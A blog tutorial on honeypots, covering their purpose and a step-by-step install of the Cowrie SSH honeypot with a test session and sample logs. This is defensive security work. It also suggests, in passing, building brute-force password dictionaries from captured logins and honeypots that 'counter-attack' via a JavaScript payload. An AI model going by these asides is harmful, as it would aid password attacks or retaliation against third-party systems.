Mining Deep Cyber Space Intelligence by Deploying Your Own Honeypots

Published Apr 09, 2018
Mining Deep Cyber Space Intelligence by Deploying Your Own Honeypots

What is this article about?

This article aims to give you a general understanding of honeypots.
I will also guide you through installing and deploying your own honeypot using Cowrie and give you ideas and examples on how to collect the malicious information that's being picked up by your honepots.

Most importantly, enjoy and appreciate the fun things that are being collected by your honeypots.

What is a honeypot?

According to Wikipedia:
Screen Shot 2018-04-04 at 5.13.42 pm.png

......

drake-hotline-bling-jacket-moncler.png

Let's ignore that and let me try to explain that to you in simple words:

A Honeypot is basically a "fake" service pretending to be a "normal" service that lures the attackers to target them.

What can a honeypot simulate?

  • Fake Server (e.g. Web Server, TOR Node)
  • Fake Service (e.g. SSH, RDP, FTP)
  • Fake ID (e.g. Email Address, Online Accounts)
  • And Much More...

A honeypot can also be a real thing running as it is, for example, a real server. The advantage of this is that it will be able to fully simulate the functionalities to the maximum extent. However, the disadvantage is that you will need to make sure the attacker doesn't escape your control. There's also a chance the attacker gets out of your control and in the worst case, backtracks you.

Why You Need One

For LEARNING!

1I2GwH0.jpg
As your honeypots are located in the Frontier Cyber Battlefield, you will be able to capture world's most advanced malicious data and have the opportunity to analyze them.

Or, if you have many more honeypots set up in different regions of the world, you can potentially turn yourself into a mini ZoomEye or NORSE Live Attack Map, where you can visualize thia data or create a cyber threat map to analyze the influence of the new threats as they come out.

Do you want to make your own brute force dictionaries by collecting what your honeypot received?
Yeah mate, you got my idea πŸ˜›

For FUN!

24cdebc8754ced60f9d22d34f6edf98ceec08262f9d08962127b54c5a90afa34.jpg
I've hosted a nice SSH honeypot called Cowrie (I will show you how to install it in the next part).
Many of its collected results were very interesting.

  • Such as some attackers' personal "ammunition garage" and the weapons they sell.
    werwolf.png

  • In the old days, some malicious attackers were using my honeypot to try to communicate with Pokemon Go's servers.
    niantic.png

  • Or you can also visualize the malicious attacks like I did:
    untitledb.png

  • I've also discovered one attacker who tried to use my honeypot to connect to an IRC room to build his/her IRC botnet. And the IRC admin's name was Jihad... (No screenshots for this one)

For PROFITS!

The main purposes of honeypots are mostly to collect threat intelligence and to capture attackers' time/efforts by placing honeypots inside an enterprise network.

Both of these have their potentials profits. I will leave them to you to think about πŸ˜ƒ I will also add this one:

  • What if the honeypot has the ability to counter-attack? (e.g. via a JS payload).

You are more than welcome to post thoughts/ideas in the comment section below πŸ˜›

Honeypot Setup:

Installation

05102017-e2.jpg
Here comes the practical part!

Let's install Cowrie on your honeypot server:

Step 1: Install Dependencies

$ sudo apt-get install git virtualenv libmpfr-dev libssl-dev libmpc-dev libffi-dev build-essential libpython-dev -y

Step 2: Create Cowrie User Account

$ sudo adduser --disabled-password cowrie
Adding user `cowrie' ...
Adding new group `cowrie' (1002) ...
Adding new user `cowrie' (1002) with group `cowrie' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]

$ sudo su - cowrie

Step 3: Download Cowrie Repo

$ git clone http://github.com/micheloosterhof/cowrie
Cloning into 'cowrie'...
remote: Counting objects: 2965, done.
remote: Compressing objects: 100% (1025/1025), done.
remote: Total 2965 (delta 1908), reused 2962 (delta 1905), pack-reused 0
Receiving objects: 100% (2965/2965), 3.41 MiB | 2.57 MiB/s, done.
Resolving deltas: 100% (1908/1908), done.
Checking connectivity... done.

$ cd cowrie

Step 4: Create Virtual Environment

$ pwd
/home/cowrie/cowrie

$ virtualenv cowrie-env
New python executable in ./cowrie/cowrie-env/bin/python
Installing setuptools, pip, wheel...done.

$ source cowrie-env/bin/activate
(cowrie-env)

$ pip install --upgrade -r requirements.txt
$ cd bin/
$ ./cowrie start
Starting cowrie in the background...

Step 5: Change SSH port
We need to change the default SSH port (22) to something else.

$ vim /etc/ssh/sshd_config
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 65432
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

Step 6: Change Cowrie's SSH port
As Cowrie listens by default on port 2222, we forward SSH port 22's traffic to port 2222.

$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Step 7: Restart Cowrie

$ bin/cowrie restart

Testing Out

TrapHappy1.jpg
Let's log into our honeypot using username "root" with password "admin"

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

root@svr04:~# whoami
root

root@svr04:~# ping google.com
PING google.com (29.89.32.244) 56(84) bytes of data.
64 bytes from google.com (29.89.32.244): icmp_seq=1 ttl=50 time=44.4 ms
64 bytes from google.com (29.89.32.244): icmp_seq=2 ttl=50 time=42.5 ms
64 bytes from google.com (29.89.32.244): icmp_seq=3 ttl=50 time=40.5 ms
^C
--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 907ms
rtt min/avg/max/mdev = 48.264/50.352/52.441/2.100 ms

root@svr04:~# uname -a
Linux svr04 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux

root@svr04:~# apt install python
bash: apt: command not found

root@svr04:~# yum install python
bash: yum: command not found

root@svr04:~# wget google.com
--2018-04-05 05:43:22--  http://google.com
Connecting to google.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html; charset=ISO-8859-1]
Saving to: `/root/index.html'

100%[======================================>] 0            100K/s  eta 0s

2018-04-05 05:43:22 (100 KB/s) - `/root/index.html' saved [10593/0]

root@svr04:~# ls
index.html 

root@svr04:~# cat index.html 
<!doctype html><html itemscope="" ite.............(and more...)

On the honeypot's side, the attacker's actions are logged under /home/cowrie/cowrie/log/cowrie.log.

For demonstration purposes, I've removed extra information, such as datetime, networking logs, and my own IPs.

New connection: XXX.XXX.XXX.XXX:34252 (XXX.XXX.XXX.XXX:2222)
Remote SSH version: SSH-2.0-OpenSSH_7.5p1 Ubuntu-10ubuntu0.1
...
login attempt [root/admin] succeeded
Initialized emulated server as architecture: linux-x64-lsb
...
pty request: 'xterm-256color' (51, 181, 1270, 769)
Terminal Size: 51 181
request_env: LANG=en_US.UTF-8
getting shell
Opening TTY Log: log/tty/20180405-054249-c9f804dbd74c-0i.log
CMD: whoami
Command found: whoami 
CMD: ping google.com
Command found: ping google.com
CMD: uname -a
Command found: uname -a
CMD: apt install python
Command not found: apt install python
CMD: yum install python
Command not found: yum install python
CMD: wget google.com
Command found: wget google.com
Starting factory <HTTPProgressDownloader: http://google.com>
...
CMD: ls
Command found: ls 
CMD: cat index.html 
Command found: cat /root/index.html
connection lost

You can also add new username:password combinations in Cowrie by modifying /home/cowrie/cowrie/data/userdb.txt.

Cowrie also supports Splunk indexing for visualization and analytics. You can refer to this Cowrie Configuration or simply install a Splunk Forwarder.

My attack map image above was done using Splunk simply using Geolocation DB and a Heatmap.
However, feel free to create your own malicious data visualizations using D3.js or other visualization tools. πŸ˜ƒ

PS. You will probably find this helpful too: Send Cowrie Output to a MySQL Database.

I hope this article gave you a fresh feeling/vision on honeypots and if you do have any questions/thoughts, you're welcome to comment below.

Happy Honeypotting! πŸ˜›

The End

Discover and read more posts from Danny Jian
get started